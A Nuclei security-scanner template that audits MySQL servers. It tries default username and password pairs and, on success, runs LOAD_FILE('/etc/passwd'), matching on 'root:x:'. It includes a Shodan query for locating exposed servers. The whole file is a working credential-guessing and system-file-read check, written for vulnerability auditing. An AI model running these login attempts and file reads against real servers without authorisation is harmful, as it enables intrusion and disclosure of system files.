58 lines
1.6 KiB
YAML
58 lines
1.6 KiB
YAML
id: mysql-load-file
|
|
info:
|
|
name: MySQL LOAD_FILE - Enable
|
|
author: pussycat0x
|
|
severity: high
|
|
description: |
|
|
The LOAD_FILE function in MySQL is potentially dangerous if not used carefully, as it can pose security risks. The function is designed to read the contents of a file on the server and return the file contents as a string. However, it can be exploited if not properly restricted or sanitized, leading to security vulnerabilities.
|
|
reference:
|
|
- https://nmap.org/nsedoc/scripts/mysql-databases.html
|
|
metadata:
|
|
verified: true
|
|
max-request: 16
|
|
shodan-query: "port:3306"
|
|
tags: js,mysql,network,audit
|
|
javascript:
|
|
- code: |
|
|
let m = require('nuclei/mysql');
|
|
let c = m.MySQLClient();
|
|
let response = c.ExecuteQuery(Host,Port,User,Pass,Query);
|
|
Export(response);
|
|
|
|
args:
|
|
Host: "{{Host}}"
|
|
Port: "3306"
|
|
Query: SELECT LOAD_FILE('/etc/passwd')
|
|
User: "{{usernames}}"
|
|
Pass: "{{passwords}}"
|
|
|
|
payloads:
|
|
usernames:
|
|
- root
|
|
- admin
|
|
- mysql
|
|
- test
|
|
passwords:
|
|
- root
|
|
- admin
|
|
- mysql
|
|
- test
|
|
attack: clusterbomb
|
|
|
|
stop-at-first-match: true
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- success == true
|
|
|
|
- type: word
|
|
words:
|
|
- "root:x:"
|
|
|
|
extractors:
|
|
- type: json
|
|
part: response
|
|
json:
|
|
- .Rows[]
|
|
# digest: 4b0a00483046022100907d860204e982df899d9b32c76da23e00fdc18883029567f173190cd5ed7421022100ca703635c58c61a43a8c473060117cb60312849b2a2037b1c48828dd3c350a09:922c64590222798bb761d5b6d8e72950 |